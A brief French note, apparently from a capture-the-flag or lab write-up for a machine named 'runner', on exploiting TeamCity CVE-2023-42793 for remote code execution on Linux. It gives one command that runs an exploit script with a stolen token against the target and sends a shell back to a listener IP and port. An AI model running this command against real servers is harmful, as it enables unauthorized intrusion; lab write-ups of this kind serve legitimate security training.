
TeamCity RCE pour Linux (CVE-2023-42793)
Vous devrez d'abord obtenir le jeton en utilisant un autre exploit. Cependant, l'exploit suivant vous permettra d'obtenir une RCE sur le serveur Linux, car il encode la charge utile dans l'URL et l'envoie au serveur.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT